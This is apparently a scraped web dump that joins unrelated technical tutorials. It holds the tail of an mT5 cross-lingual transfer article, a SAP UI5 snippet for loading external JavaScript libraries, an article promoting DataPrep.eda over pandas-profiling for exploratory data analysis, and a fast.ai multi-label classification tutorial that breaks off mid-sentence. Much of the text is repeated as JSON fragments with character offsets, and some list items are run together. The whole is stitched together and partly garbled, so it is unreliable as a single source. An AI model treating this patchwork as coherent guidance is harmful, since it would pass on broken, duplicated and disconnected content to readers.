}, { "code": null, "e": 18392, "s": 18304, "text": "To keep the code clean, we’ll be doing this step in another file, translate_dataset.py." }, { "code": null, "e": 18608, "s": 18392, "text": "You can drop the languages you don’t want from the languages list in line 51. You can also comment out the unused translation models defined in model_map to prevent them from being downloaded and loaded into memory." }, { "code": null, "e": 18708, "s": 18608, "text": "Running the script above will generate the translated datasets and save them to the data directory." }, { "code": null, "e": 18948, "s": 18708, "text": "The code to calculate the metrics can be easily adapted from our original evaluation code. The only differences are that we need to loop over the eval.csv files for each language and we’ll only be evaluating the binary classification task." }, { "code": null, "e": 18970, "s": 18948, "text": "Let’s see how we did!" }, { "code": null, "e": 19056, "s": 18970, "text": "Very impressive, considering the mT5 model was only fine-tuned on an English dataset!" }, { "code": null, "e": 19293, "s": 19056, "text": "Based on these results, it seems like mT5 favours more common languages, although that is to be expected. However, it’s also possible that this difference is due to translation models for more common languages being relatively superior." }, { "code": null, "e": 19495, "s": 19293, "text": "Unfortunately, it doesn’t perform well for all the supported languages. For example, I tried a few examples in my native language, Sinhalese, with fairly poor (although not completely useless) results." }, { "code": null, "e": 19649, "s": 19495, "text": "If you want to try some quick predictions yourself, use the command simple-viewerin the terminal (in the directory which contains the outputs directory)." }, { "code": null, "e": 19792, "s": 19649, "text": "Overall, I’m quite impressed with the performance of the mT5 model, particularly in the context of cross-lingual, zero-shot transfer learning." }, { "code": null, "e": 20123, "s": 19792, "text": "However, mT5 does seem to struggle with smaller datasets when compared to T5. Oversampling the similarity dataset to bring it in line with the others (or even training mT5 on this task alone) didn’t solve the issue, so it’s possible that the small size of the dataset isn’t the sole factor here. This calls for more investigation!" }, { "code": null, "e": 20362, "s": 20123, "text": "The ability to train a model on English data and have it automatically transfer that knowledge to a bunch of other languages can be incredibly useful, especially when you consider that most training datasets are only available in English." }, { "code": null, "e": 20456, "s": 20362, "text": "With such versatility, I’m sure that people will come up with a ton of creative applications!" }, { "code": null, "e": 20832, "s": 20456, "text": "mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdfExploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.htmlHuggingface Transformers — https://huggingface.co/transformers/" }, { "code": null, "e": 20938, "s": 20832, "text": "mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdf" }, { "code": null, "e": 21055, "s": 20938, "text": "Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683" }, { "code": null, "e": 21147, "s": 21055, "text": "Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.html" } ]
Loading External Libraries in SAP UI5
External libraries can be inserted using a file in a normal script tag. SAP UI5 also supports JQuery so it can be done by extending your heading from the controller. var s = document.createElement("script"); s.type = "text/javascript"; s.src = "http://domainname.com/somescript"; $("head").append(s); You can also add any external file using the following command − jQuery.sap.registerModulePath("ModuleName","http://Domainname.com"); jQuery.sap.require("ModuleName.jsFileName"); You can navigate to the following path for more details− https://blogs.sap.com/2016/04/22/include-external-javascript-library-in-sapui5/
[ { "code": null, "e": 1228, "s": 1062, "text": "External libraries can be inserted using a file in a normal script tag. SAP UI5 also supports JQuery so it can be done by extending your heading from the controller." }, { "code": null, "e": 1363, "s": 1228, "text": "var s = document.createElement(\"script\");\ns.type = \"text/javascript\";\ns.src = \"http://domainname.com/somescript\";\n$(\"head\").append(s);" }, { "code": null, "e": 1428, "s": 1363, "text": "You can also add any external file using the following command −" }, { "code": null, "e": 1542, "s": 1428, "text": "jQuery.sap.registerModulePath(\"ModuleName\",\"http://Domainname.com\");\njQuery.sap.require(\"ModuleName.jsFileName\");" }, { "code": null, "e": 1599, "s": 1542, "text": "You can navigate to the following path for more details−" }, { "code": null, "e": 1679, "s": 1599, "text": "https://blogs.sap.com/2016/04/22/include-external-javascript-library-in-sapui5/" } ]
Exploratory Data Analysis: DataPrep.eda vs Pandas-Profiling | by Brandon Lockhart | Towards Data Science
Exploratory data analysis (EDA) is part and parcel of every data science project. The purpose of EDA is to achieve an understanding of the data and to gain insights about phenomena the data represents. Pandas-profiling (2016) has been lauded as an exemplary tool for doing EDA [1, 2, 3]. However, a significant downside of pandas-profiling is that it gives a dataset’s profile! EDA is an iterative process where the data scientist will question, understand, process, transform the data, and repeat [4, 5, 6]. The rigid structure of pandas-profiling is contrary to current EDA best practices. DataPrep.eda (2020) is a Python library for doing EDA produced by SFU’s Data Science Research Group. DataPrep.eda enables iterative and task-centric analysis — as EDA is meant to be done. (see this article for a comprehensive introduction to DataPrep.eda) Better API DesignUp to 100x FasterSmart VisualizationHandles Large Data Better API Design Up to 100x Faster Smart Visualization Handles Large Data “‘Exploratory data analysis’ is an attitude, a state of flexibility, a willingness to look for those things that we believe are not there, as well as those we believe to be there.” — John Tukey, Author of Exploratory Data Analysis We will use the plot() function from DataPrep.eda. To understand how to perform EDA effectively with this function, the following gives the syntax of the function call with the intent of the data scientist: plot(df): “I want an overview of the dataset” plot(df, “col_1”): “I want to understand the column col_1” plot(df, “col_1”, “col_2”): “I want to understand the relationship between columns col_1 and col_2” To see this in action, we will use a dataset consisting of records of COVID-19 patients in South Korea. Let’s start with an overview of the dataset: from dataprep.eda import plotimport pandas as pddf = pd.read_csv("PatientInfo.csv")df["confirmed_date"] = pd.to_datetime(df["confirmed_date"])plot(df) Notice the column birth_year seemingly has a bimodal distribution, let’s learn more about this column: # transform birth_year to age in 2020 for simplicitydf["age"] = 2020 - df["birth_year"]plot(df, "age", bins=26) Using the tooltip we can inspect the bounds of the modes, and use the various plots to attain a comprehensive understanding of this distribution. Next, let’s investigate the age distribution of men and women for contracting COVID-19. To do this, we simply add the column sex to the previous function call: plot(df, "age", "sex", bins=26) We see a large disparity in the age distributions for contracting COVID-19 between men and women — all with one simple line of code! This exemplifies how EDA is meant to be performed — question, visualize, understand, repeat. Taking under 0.5 seconds to finish each above command, DataPrep.eda is an efficient and effective tool for doing EDA. We run the following code where it takes pandas-profiling over 50 seconds to produce a report: from pandas_profiling import ProfileReportProfileReport(df).to_widgets() To analyze the univariate distributions, pandas-profiling has the following output: The user needs to toggle each column to see its information. Although we can find the bimodal distribution of birth_year, pandas-profiling has no support for further investigation of this insight, and no support for analyzing the relationship between age and sex. For this simple EDA scenario, DataPrep.eda enabled the discovery of significant insights, but pandas-profiling was inadequate. User interaction with the data is imperative for effective data understanding [7]. DataPrep.eda creates all plots with Bokeh, an interactive visualization library, and incorporates a tooltip which enables an exact reading of each component of a visualization. Pandas-profiling, however, does not support a tooltip. Recall that in Section 1 it took DataPrep.eda under 0.5 seconds to complete each task, yet it took pandas-profiling over 50 seconds to produce a report. DataPrep.eda is faster than pandas-profiling for two reasons: DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas.DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset. DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas. DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset. DataPrep.eda can be used to generate components of pandas-profiling’s report, enabling a direct performance comparison. The following figure shows the results of running pandas-profiling’s ProfileReport against three components of DataPrep.eda: univariate analysis (plot(df)), correlation matrices (plot_correlation(df)) and missing value plots (plot_missing(df)). Using Dask instead of Pandas is the main reason DataPrep.eda is faster than pandas-profiling. More specific factors affecting the performance are DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially.DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets). DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially. DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets). Some of the intelligent features of DataPrep.eda include selecting the right plots to visualize the data for each EDA task; column type inference (numerical, categorical, and datetime); finding an appropriate time unit for each plot (the user can also specify it); outputting the categorical values with the highest count for visual clarity (the user can also specify). To see these features in action, let’s understand how people are contracting COVID-19 over time, i.e., the relationship between the columns confirmed_date and infection_case. We run plot(df, "confirmed_date", "infection_case") We can easily see which methods of contraction are significant and during which periods! No! Pandas-profiling only supports interactions in the form of correlation matrices (also supported by DataPrep.eda) and a heat map for bivariate analysis of two continuous variables. Effective bivariate analysis is too expensive in a dataset-profiling framework since it must be computed for each pair of columns, even though only a small subset of relationships is likely interesting to a user. DataPrep.eda using Dask works with larger than memory datasets. Dask supports out-of-core and parallel processing so computations on very large datasets can be evaluated efficiently. Pandas-profiling using Pandas only has data structures for in-memory analytics; pandas-profiling suffers from significant performance degradation on large datasets. Exploratory data analysis is an iterative cycle with steps including Questioning the dataAnswering the questions by processing and visualizing the dataRefining previous questions after achieving a new understanding, or creating new questions Questioning the data Answering the questions by processing and visualizing the data Refining previous questions after achieving a new understanding, or creating new questions There is no one-size-fits-all data profile that is suitable for comprehensive EDA. DataPrep.eda is a better tool for doing EDA than pandas-profiling for four reasons: Better API design DataPrep.eda’s APIs are designed for EDA rather than data profilingUp to 100x FasterDataPrep.eda executes computations in parallelSmart VisualizationDataPrep.eda will automatically select the right plots to visualize the dataHandles Large DataDataPrep.eda supports out-of-core processing Better API design DataPrep.eda’s APIs are designed for EDA rather than data profiling Up to 100x FasterDataPrep.eda executes computations in parallel Smart VisualizationDataPrep.eda will automatically select the right plots to visualize the data Handles Large DataDataPrep.eda supports out-of-core processing It’s time to move on from generating a data profile, and perform EDA in the manner it’s meant to be done with DataPrep.eda. A notebook with the code from this article can be found here. To install DataPrep.eda, and for information about contributing to the project, visit here. A DataPrep.eda tutorial video can be found here. Don’t forget to star the project on GitHub ★. [1] M. Deep, Quick Exploratory Data Analysis: Pandas Profiling (2020), Medium [2] L. Frei, Speed Up Your Exploratory Data Analysis With Pandas-Profiling (2019), Towards Data Science [3] R. Rei, EDA Using Panda’s Profiling (2020), Towards Data Science [4] D. Bourke, A Gentle Introduction to Exploratory Data Analysis (2019), Towards Data Science [5] J. Wei, Exploratory Data Analysis: A Practical Guide and Template for Structured Data (2019), Towards Data Science [6] G. Grolemund and H. Wickham, R for Data Science (December 2016), Online Book [7] W. Koehrsen, The Next Level of Data Visualization in Python (2019), Towards Data Science
[ { "code": null, "e": 373, "s": 171, "text": "Exploratory data analysis (EDA) is part and parcel of every data science project. The purpose of EDA is to achieve an understanding of the data and to gain insights about phenomena the data represents." }, { "code": null, "e": 763, "s": 373, "text": "Pandas-profiling (2016) has been lauded as an exemplary tool for doing EDA [1, 2, 3]. However, a significant downside of pandas-profiling is that it gives a dataset’s profile! EDA is an iterative process where the data scientist will question, understand, process, transform the data, and repeat [4, 5, 6]. The rigid structure of pandas-profiling is contrary to current EDA best practices." }, { "code": null, "e": 1019, "s": 763, "text": "DataPrep.eda (2020) is a Python library for doing EDA produced by SFU’s Data Science Research Group. DataPrep.eda enables iterative and task-centric analysis — as EDA is meant to be done. (see this article for a comprehensive introduction to DataPrep.eda)" }, { "code": null, "e": 1091, "s": 1019, "text": "Better API DesignUp to 100x FasterSmart VisualizationHandles Large Data" }, { "code": null, "e": 1109, "s": 1091, "text": "Better API Design" }, { "code": null, "e": 1127, "s": 1109, "text": "Up to 100x Faster" }, { "code": null, "e": 1147, "s": 1127, "text": "Smart Visualization" }, { "code": null, "e": 1166, "s": 1147, "text": "Handles Large Data" }, { "code": null, "e": 1347, "s": 1166, "text": "“‘Exploratory data analysis’ is an attitude, a state of flexibility, a willingness to look for those things that we believe are not there, as well as those we believe to be there.”" }, { "code": null, "e": 1397, "s": 1347, "text": "— John Tukey, Author of Exploratory Data Analysis" }, { "code": null, "e": 1604, "s": 1397, "text": "We will use the plot() function from DataPrep.eda. To understand how to perform EDA effectively with this function, the following gives the syntax of the function call with the intent of the data scientist:" }, { "code": null, "e": 1650, "s": 1604, "text": "plot(df): “I want an overview of the dataset”" }, { "code": null, "e": 1709, "s": 1650, "text": "plot(df, “col_1”): “I want to understand the column col_1”" }, { "code": null, "e": 1809, "s": 1709, "text": "plot(df, “col_1”, “col_2”): “I want to understand the relationship between columns col_1 and col_2”" }, { "code": null, "e": 1958, "s": 1809, "text": "To see this in action, we will use a dataset consisting of records of COVID-19 patients in South Korea. Let’s start with an overview of the dataset:" }, { "code": null, "e": 2109, "s": 1958, "text": "from dataprep.eda import plotimport pandas as pddf = pd.read_csv(\"PatientInfo.csv\")df[\"confirmed_date\"] = pd.to_datetime(df[\"confirmed_date\"])plot(df)" }, { "code": null, "e": 2212, "s": 2109, "text": "Notice the column birth_year seemingly has a bimodal distribution, let’s learn more about this column:" }, { "code": null, "e": 2324, "s": 2212, "text": "# transform birth_year to age in 2020 for simplicitydf[\"age\"] = 2020 - df[\"birth_year\"]plot(df, \"age\", bins=26)" }, { "code": null, "e": 2470, "s": 2324, "text": "Using the tooltip we can inspect the bounds of the modes, and use the various plots to attain a comprehensive understanding of this distribution." }, { "code": null, "e": 2630, "s": 2470, "text": "Next, let’s investigate the age distribution of men and women for contracting COVID-19. To do this, we simply add the column sex to the previous function call:" }, { "code": null, "e": 2662, "s": 2630, "text": "plot(df, \"age\", \"sex\", bins=26)" }, { "code": null, "e": 2795, "s": 2662, "text": "We see a large disparity in the age distributions for contracting COVID-19 between men and women — all with one simple line of code!" }, { "code": null, "e": 3006, "s": 2795, "text": "This exemplifies how EDA is meant to be performed — question, visualize, understand, repeat. Taking under 0.5 seconds to finish each above command, DataPrep.eda is an efficient and effective tool for doing EDA." }, { "code": null, "e": 3101, "s": 3006, "text": "We run the following code where it takes pandas-profiling over 50 seconds to produce a report:" }, { "code": null, "e": 3174, "s": 3101, "text": "from pandas_profiling import ProfileReportProfileReport(df).to_widgets()" }, { "code": null, "e": 3258, "s": 3174, "text": "To analyze the univariate distributions, pandas-profiling has the following output:" }, { "code": null, "e": 3522, "s": 3258, "text": "The user needs to toggle each column to see its information. Although we can find the bimodal distribution of birth_year, pandas-profiling has no support for further investigation of this insight, and no support for analyzing the relationship between age and sex." }, { "code": null, "e": 3649, "s": 3522, "text": "For this simple EDA scenario, DataPrep.eda enabled the discovery of significant insights, but pandas-profiling was inadequate." }, { "code": null, "e": 3964, "s": 3649, "text": "User interaction with the data is imperative for effective data understanding [7]. DataPrep.eda creates all plots with Bokeh, an interactive visualization library, and incorporates a tooltip which enables an exact reading of each component of a visualization. Pandas-profiling, however, does not support a tooltip." }, { "code": null, "e": 4117, "s": 3964, "text": "Recall that in Section 1 it took DataPrep.eda under 0.5 seconds to complete each task, yet it took pandas-profiling over 50 seconds to produce a report." }, { "code": null, "e": 4179, "s": 4117, "text": "DataPrep.eda is faster than pandas-profiling for two reasons:" }, { "code": null, "e": 4461, "s": 4179, "text": "DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas.DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset." }, { "code": null, "e": 4580, "s": 4461, "text": "DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas." }, { "code": null, "e": 4744, "s": 4580, "text": "DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset." }, { "code": null, "e": 5109, "s": 4744, "text": "DataPrep.eda can be used to generate components of pandas-profiling’s report, enabling a direct performance comparison. The following figure shows the results of running pandas-profiling’s ProfileReport against three components of DataPrep.eda: univariate analysis (plot(df)), correlation matrices (plot_correlation(df)) and missing value plots (plot_missing(df))." }, { "code": null, "e": 5255, "s": 5109, "text": "Using Dask instead of Pandas is the main reason DataPrep.eda is faster than pandas-profiling. More specific factors affecting the performance are" }, { "code": null, "e": 5533, "s": 5255, "text": "DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially.DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets)." }, { "code": null, "e": 5650, "s": 5533, "text": "DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially." }, { "code": null, "e": 5812, "s": 5650, "text": "DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets)." }, { "code": null, "e": 5869, "s": 5812, "text": "Some of the intelligent features of DataPrep.eda include" }, { "code": null, "e": 5936, "s": 5869, "text": "selecting the right plots to visualize the data for each EDA task;" }, { "code": null, "e": 5998, "s": 5936, "text": "column type inference (numerical, categorical, and datetime);" }, { "code": null, "e": 6077, "s": 5998, "text": "finding an appropriate time unit for each plot (the user can also specify it);" }, { "code": null, "e": 6182, "s": 6077, "text": "outputting the categorical values with the highest count for visual clarity (the user can also specify)." }, { "code": null, "e": 6364, "s": 6182, "text": "To see these features in action, let’s understand how people are contracting COVID-19 over time, i.e., the relationship between the columns confirmed_date and infection_case. We run" }, { "code": null, "e": 6409, "s": 6364, "text": "plot(df, \"confirmed_date\", \"infection_case\")" }, { "code": null, "e": 6498, "s": 6409, "text": "We can easily see which methods of contraction are significant and during which periods!" }, { "code": null, "e": 6895, "s": 6498, "text": "No! Pandas-profiling only supports interactions in the form of correlation matrices (also supported by DataPrep.eda) and a heat map for bivariate analysis of two continuous variables. Effective bivariate analysis is too expensive in a dataset-profiling framework since it must be computed for each pair of columns, even though only a small subset of relationships is likely interesting to a user." }, { "code": null, "e": 7078, "s": 6895, "text": "DataPrep.eda using Dask works with larger than memory datasets. Dask supports out-of-core and parallel processing so computations on very large datasets can be evaluated efficiently." }, { "code": null, "e": 7243, "s": 7078, "text": "Pandas-profiling using Pandas only has data structures for in-memory analytics; pandas-profiling suffers from significant performance degradation on large datasets." }, { "code": null, "e": 7312, "s": 7243, "text": "Exploratory data analysis is an iterative cycle with steps including" }, { "code": null, "e": 7485, "s": 7312, "text": "Questioning the dataAnswering the questions by processing and visualizing the dataRefining previous questions after achieving a new understanding, or creating new questions" }, { "code": null, "e": 7506, "s": 7485, "text": "Questioning the data" }, { "code": null, "e": 7569, "s": 7506, "text": "Answering the questions by processing and visualizing the data" }, { "code": null, "e": 7660, "s": 7569, "text": "Refining previous questions after achieving a new understanding, or creating new questions" }, { "code": null, "e": 7743, "s": 7660, "text": "There is no one-size-fits-all data profile that is suitable for comprehensive EDA." }, { "code": null, "e": 7827, "s": 7743, "text": "DataPrep.eda is a better tool for doing EDA than pandas-profiling for four reasons:" }, { "code": null, "e": 8133, "s": 7827, "text": "Better API design DataPrep.eda’s APIs are designed for EDA rather than data profilingUp to 100x FasterDataPrep.eda executes computations in parallelSmart VisualizationDataPrep.eda will automatically select the right plots to visualize the dataHandles Large DataDataPrep.eda supports out-of-core processing" }, { "code": null, "e": 8219, "s": 8133, "text": "Better API design DataPrep.eda’s APIs are designed for EDA rather than data profiling" }, { "code": null, "e": 8283, "s": 8219, "text": "Up to 100x FasterDataPrep.eda executes computations in parallel" }, { "code": null, "e": 8379, "s": 8283, "text": "Smart VisualizationDataPrep.eda will automatically select the right plots to visualize the data" }, { "code": null, "e": 8442, "s": 8379, "text": "Handles Large DataDataPrep.eda supports out-of-core processing" }, { "code": null, "e": 8566, "s": 8442, "text": "It’s time to move on from generating a data profile, and perform EDA in the manner it’s meant to be done with DataPrep.eda." }, { "code": null, "e": 8815, "s": 8566, "text": "A notebook with the code from this article can be found here. To install DataPrep.eda, and for information about contributing to the project, visit here. A DataPrep.eda tutorial video can be found here. Don’t forget to star the project on GitHub ★." }, { "code": null, "e": 8893, "s": 8815, "text": "[1] M. Deep, Quick Exploratory Data Analysis: Pandas Profiling (2020), Medium" }, { "code": null, "e": 8997, "s": 8893, "text": "[2] L. Frei, Speed Up Your Exploratory Data Analysis With Pandas-Profiling (2019), Towards Data Science" }, { "code": null, "e": 9066, "s": 8997, "text": "[3] R. Rei, EDA Using Panda’s Profiling (2020), Towards Data Science" }, { "code": null, "e": 9161, "s": 9066, "text": "[4] D. Bourke, A Gentle Introduction to Exploratory Data Analysis (2019), Towards Data Science" }, { "code": null, "e": 9280, "s": 9161, "text": "[5] J. Wei, Exploratory Data Analysis: A Practical Guide and Template for Structured Data (2019), Towards Data Science" }, { "code": null, "e": 9361, "s": 9280, "text": "[6] G. Grolemund and H. Wickham, R for Data Science (December 2016), Online Book" } ]
Multi-Label Classification in fast.ai Using Spreadsheets | by Vinayak Nayak | Towards Data Science
IntroductionThe DatasetModel, Activation Function and LossModel EvaluationConclusionReferences Introduction The Dataset Model, Activation Function and Loss Model Evaluation Conclusion References Many a time we come across images which have multiple objects of interest in them which we wish to identify. For instance, in the following image we can see that we have both a chair and a tv monitor. To solve the above problem, we need to be able to detect multiple classes/labels in a given image. This is what multi-label classification is. Given an image, categorize it into more than one class/label/category. Since fastai is a very convenient wrapper around Pytorch, there's very little that we will have to change from the perspective of code but the logic behind solving this problem will be somewhat different. We cannot just use our regular softmax activation with cross-entropy loss function; also the evaluation bit here is much more involved than that of a single-label classification problem. We shall discuss every bit in detail in the following sections. Let's first begin with the dataset. We will be using the PASCAL_2007 dataset for this task. This is a dataset which contains 20 labels in all and mind the fact that one image can have multiple labels! Simply use fastai’s untar_data to download the dataset to your disk. It will be stored in a special directory called .fastai at your home/root location from fastai.vision.all import *path = untar_data(URLs.PASCAL_2007) If we look at the stats from a label POV for our train dataset, we obtain the following. From the above figure we can see that “person” is a highly recurring category in the train dataset and other categories are more or less equally represented. So, we have an imbalance in our dataset. Another interesting thing to note is that the sum of label counts is not the same as number of data points. In single label this used to be true because every image had one and only one label but in case of a multi-label classifier, since each datapoint is not bound to have only one object, it is worth noting that there can be more labels than number of images. This will lead us to change our strategy for building classifiers as against single-label classification. In this dataset, we’re given the labels in the form of a dataframe and not in a folder structure, same as in Imagenet. So we’ll have to read each entry from the dataframe and define getter methods to retrieve the values of input and output. Also, the split is defined using a column in the dataframe called is_valid. We shall define a custom function that provides the splits i.e. indices of the train and validation set separately for all the points in our dataset. In code, this looks as follows Now, we can define a dataloader once we have the proper getters for the three main tasks i.e. getting dependent & independent variable and how to split them into train and validation files. Unlike single label classification tasks, for this task, we will have to use the MultiCategoryBlock in order to read our dependent variables as one-hot encoded vectors. The rest of the loading remains the same. We can load the data as follows Our independent variable is an Image hence ImageBlock as input followed by a MultiCategoryBlock for one-hot encoding and loading the dependent variable. Our splitter is defined above which takes the is_valid column from our dataframe and based on that boolean variable separates train and validation entries The get_x function reads the column fname the filename and appends the base path to the file for loading The get_y function reads the column labels from the dataframe and since our labels are space separated, it splits the labels string by using the space delimiter. item_tfms and batch_tfms: We use the presizing trick from fastai to avoid lossy image cropping (like padded borders etc.) and standard augmentation methods followed by a Normalization using the imagenet_stats as we would be using a pretrained resnet50 for this classification task. Now, if we look at an example of a batch, we can observe the following. Look at how we have multiple labels in images from these examples. Although using the fast.ai API to define the model and loss is pretty straightforward, we should pause for a bit and look at the Loss Function and model, especially the loss function in detail. There are several changes which we are going to do toward the model head. We are not going to use softmax as before but sigmoid activation. What softmax does is it will transform the logits coming from the final classification linear layer to always sum up to 1. What this means for multi-label classification is that we would incur high losses when we encounter examples having multiple labels. Consider the following scenario for example We see that for this hypothetical example, the datapoint actually belongs to class 1 and 4 but the best our softmax can do is push the probability scores of these two classes to 0.5 and that of the remaining two to be 0 but no better than this. This is because probabilities must always sum to 1. Imagine if it were a three class example, then the best softmax could do is push the three probability scores to 0.33 and that of the remaining 1 to 0. Now, let’s look at Sigmoid Activation. Now, we see that the activation function doesn’t care what the other labels are. It is only focussed on the logit for the label in question, unlike softmax. The logits are all decoupled and do not impact amongst themselves as against softmax. This is why in the figure above you can see that the Sigmoid activation probabilities for classes 1 and 3 can climb high to approach 1 and the other two can approach 0 independently. Now, you can appreciate better why we cannot use the softmax activation function but need a separate sigmoid activation function for this problem. Since we have changed the activation function, we ought to reconsider our choice for the loss function. For single label classification, we use the cross entropy loss function defined as follows where ti is the true value and pi is the probability predicted for a label If we continue applying this loss function to our sigmoid activated outputs, we’re in trouble. We will not then be penalizing anything where the ground truth label is 0. For the same example above, if we compute the CE loss we see the picture as follows On the other hand, Binary Cross Entropy is defined as follows where ti is the true value and pi is the probability predicted for a label Now this is really interesting. It makes sure that whatever the label (0/1) some loss will always come to penalize the model for bad predictions. It will never be zero. Where ground truth is 1, the loss will be -log(p) and where it’s 0, the loss would be log(1-p). This would be very useful for the model to individually penalize the model via the different neurons in the classifier head for their mispredictions. In the image above, we can see how even when the ground truth label is 0, we are getting finite loss values for those neurons as well as against plain cross-entropy loss employed in single-label classification. For model, we can still continue using our imagenet pretrained backbones and start with transfer learning. Why the same model even if the task is different -Single Label as opposed to Multi label Classification? Although in the end we have to predict multiple labels per output, we still can make use of the same filters which were pretrained to identify humans, animals, objects etc. that were a part of the big imagenet dataset. The pretrained backbone which has intelligently learned these 1000 classes has filters which could detect faces of humans, fur of cats, tails of dogs etc. and similar classes are also present in the PASCAL_2007 dataset. Hence it makes sense to start with this as the anchor point to leverage what we already have! So, we are now in a position to define a fastai learner to do the training. It is as follows: learn = cnn_learner(dls, resnet50, metrics=partial(accuracy_multi, thresh=0.5)) Here we have changed the metrics to use accuracy_multi instead of plain old accuracy. We will discuss this in detail in model evaluation but apart from that we haven’t changed anything from when we were doing Single label classification, or have we? Under the hood, fastai selects BCE loss because we have specified in the dls, our dependent variable is a MultiCategoryBlock. We can explicitly specify it but we need to be aware of it at least. Then the training and lr_find and other things remain the same as shown in the following snip. This is the most important part as this is considerably different for multi-label classification. Firstly, what is accuracy_multi? In case of multi-label classification, our targets are one-hot encoded. Also the outputs that we get are of the same shape as the targets but they're logits. So we apply sigmoid activation on those and get probabilities. In single label classification, we were comparing only one label for a datapoint and if it matches, our result is accurate otherwise it isn’t. However, for multi-label classification, for every datapoint, we predict a vector and the output is also a vector. So we need to compare these vectors instead of a single scalar for every datapoint. Since we have to compare multiple values, and then take an average across these comparisons; hence the name accuracy_multi. The following table will summarize this better. Predictions -> Probabilities to Presence/Absence As we saw in the example above, we assumed predictions as a binary field but the neural network by itself does not give us a discrete value for each class/label. It gives us an array of floats which we need to convert into a probability distribution and subsequently into a discrete value representing the presence/absence of a class/label. First part is simple and we have covered it i.e. going from logits that are output from the neural network to a probability distribution only involves applying a sigmoid activation to the probability values for the respective classes. For the next part i.e. converting probability into a discrete value; we have to do thresholding. What this means is we select a probability value and we use that as a pivot to convert the continuous probabilities into discrete distributions. The following example will explain this phenomenon better. As seen in the image, we first take the network outputs and apply sigmoid activation which gives us the probability. Next, we arbitrarily pick 5 thresholds [0.1, 0.3, 0.5, 0.7, 0.9]. Now, what we do is compare these probabilities against the thresholds. When probability > threshold we mark it as True and False otherwise. Then taking an average across the predictions gives us the accuracy for that datapoint. In single label classification, the accuracy for a single datapoint can be either 0 or 1 whereas in multi-label it could be a continuous value between 0 and 1 inclusive of the two. Now, since we’re talking about thresholds it becomes important for us during evaluation to figure out what threshold is the best. Also, currently we’re using the same threshold for all the classes/labels. We can tune the threshold over each class separately to come up with a best score for each class and then use those thresholds to get the multi-accuracy across the entire dataset. Let’s see how to do that. What we did above could be in some sense called Global Thresholding where we used a threshold for all the classes, compared the accuracy for each datapoint, came up with a plot which compares accuracy against the threshold and pick the one which gives the best accuracy. Here’s how we could do it in code This function above gives us the best accuracy point and the threshold at which it occurred which could be simply saved as a artefact with the model and during inference, when we wanna get predictions for individual labels, we can compare their probabilities against this threshold and get the discrete results to denote presence/absence of a class. However, we can do better. In practise, accuracy is not always the best evaluation metric. For eg. in a world where there’s only let’s hypothetically say 1% people who are rich, predicting every person to be poor no matter what will make you 99% accurate, but is that really good? No, right? When you create a classifier where there’s heavy class imbalance, you want your performance to be good across all classes and not just one or two classes which are very highly dominant in your dataset. Accuracy cannot tell us such information. Here, having other metrics like Precision, Recall/TPR, FPR, f1-score etc. become very useful. This post is not meant to deep-dive into these metrics but let's take a cursory glance at them and I will provide good resources at the end to delve deep into each one of those. Precision: This quantity basically tells you of all those examples which are predicted to be of a certain type, how many were actually of that type. If we look at the confusion matrix above, we can define Precision as Recall/TPR: This quantity basically specifies how many examples of a particular category were properly identified by the classifier. It is also called as True Positive Rate or TPR for short. It is given by f1-score: When we're defining a classifier, we want the two to be as high as possible and ideally to be 1 but they're kind of both inversely related to one another. Hence we define a metric which finds the point where they're both best balanced. This is the f1-score which is in principle a harmonic mean between the recall and precision defined as follows FPR: False positive rate is the number of negative examples which are misclassified. It is given by The evaluation of a classifier can be done on several grounds. For some accuracy could still be the gold standard of evaluation; for some others, f1-score might be an important figure to ensure the classifier performance across multiple categories. In many cases, the ROC or receiver operating characteristics plot could be used to figure out the classifier performance. We will evaluate our model using all the three techniques to get the best performing model given a specific criterion. A graph of ROC for bus category from the PASCAL_2007 datset on which we trained our model is as follows On the X-axis we have FPR and on the Y-axis we have Recall/TPR. We need to identify the point where the TPR is as high as possible without the FPR increasing. We can figure this out by finding the point which is closest to (0, 1) point i.e. where FPR is 0 and TPR is 1. This is shown in the curve with the red dot. For a perfect classifier, we should have a unit-rectangle kind of a graph but practically the distributions of the two classes are never completely distinguishable in most cases. The complete code to do this will become very large but it is available on GitHub which I have attached in the references section. I will sketch out the pseudo-code for doing this local thresholding and then final aggregation of the predictions. 1. Get the predictions & targets from the fastai learner 2. Separate out the predictions and targets for each and every label. The fastai predictions would be of shape `N_EXAMPLES x N_CLASSES`, so break them into N_CLASSES vectors of length `N_EXAMPLES` each. Similarly do this with the targets. 3. Select a range of thresholds and evaluate the metrics precision, recall, fpr, f1-score for all the examples of each class/label and construct the ROC-AUC Curve. 4. Select the closest point, best accuracy and best f1-score points amongst all those points over which you varied the threshold. Record the threshold for each of those points where you 